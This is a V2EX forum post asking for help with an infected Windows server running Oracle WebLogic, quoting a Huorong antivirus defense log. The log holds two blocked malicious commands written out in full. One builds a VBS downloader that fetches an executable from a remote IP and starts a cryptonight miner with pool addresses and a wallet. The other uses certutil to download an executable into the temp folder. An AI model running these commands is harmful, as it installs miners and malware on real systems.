装了火绒,智能防,查毒查不出。下面是防御日志。 1 ) 操作者:D:\Oracle\Middleware\wlserver_10.3\server\bin\beasvc.exe 命令行:D:\Oracle\MIDDLE~1\WLSERV~1.3\server\bin\beasvc.exe 风险动作:隐藏执行可疑脚本 执行文件:C:\WINDOWS\system32\cmd.exe 执行命令行:"cmd.exe" /c "cmd /c echo Set xPost = CreateObject(Microsoft.XMLHTTP) > hu.vbs&@echo taskkill /IM me.exe /f&@echo taskkill /IM 3.exe /f&@echo taskkill /IM 1e.exe /f&@echo taskkill /IM te.exe /f&@echo taskkill /IM me.exe /f&@echo xPost.Open GET,http://192.99.142.248:8220/ttte.exe,0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject(ADODB.Stream) >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile ttte.exe,2 >>hu.vbs&@cscript hu.vbs&@taskkill /IM 3.exe&@taskkill /IM iee.exe&@taskkill /IM me.exe&@taskkill /IM iee.exe&@taskkill /IM ie.exe&@taskkill /IM xe.exe&@del hu.vbs&@start ttte.exe --donate-level=1 -k -a cryptonight -o 158.69.133.20:3333 -o 192.99.142.249:3333 -o 202.144.193.110:3333 -u 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg -p x" 用户操作:已阻止 2 ) 操作者:C:\WINDOWS\system32\certutil.exe 命令行:cmd.exe /c certutil.exe -urlcache -split -f http://93.174.93.149/whdtasks.exe C:/Windows/temp/puma.exe 风险动作:利用 Certutil 下载可执行文件 执行文件:C:\WINDOWS\system32\certutil.exe 执行命令行:certutil.exe -urlcache -split -f http://93.174.93.149/whdtasks.exe C:/Windows/temp/puma.exe 用户操作:已阻止 里面装了好些个软件,服务,不想重装。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.